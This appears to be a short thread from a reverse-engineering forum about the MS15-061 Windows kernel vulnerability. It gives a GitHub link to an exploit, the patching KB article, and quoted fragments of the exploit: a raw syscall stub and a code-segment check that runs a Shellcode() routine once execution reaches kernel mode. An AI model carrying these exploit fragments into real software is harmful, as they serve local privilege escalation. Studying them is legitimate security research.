by me :geek:
https://github.com/Rootkitsmm/MS15-061
https://github.com/Rootkitsmm/MS15-061
@R00tkitSMM
A forum for reverse engineering, OS internals and malware analysis
TETYYSs wrote:So, what type of exploit is it? What KB does patch it?https://support.microsoft.com/en-us/kb/3057839
EP_X0FF wrote:yes i think just forTETYYSs wrote: P.S.
I don't know why you put assembly here where it is not needed at all.
__asm
{
mov eax, 116Dh
mov edx, 7FFE0300h
call dword ptr [edx]
retn 8
}
__asm
{
mov ax, cs
mov um, ax
}
if(um == 0x1b)
{
// USER MODE
} else
{
success=TRUE;
DebugBreak();
Shellcode();
}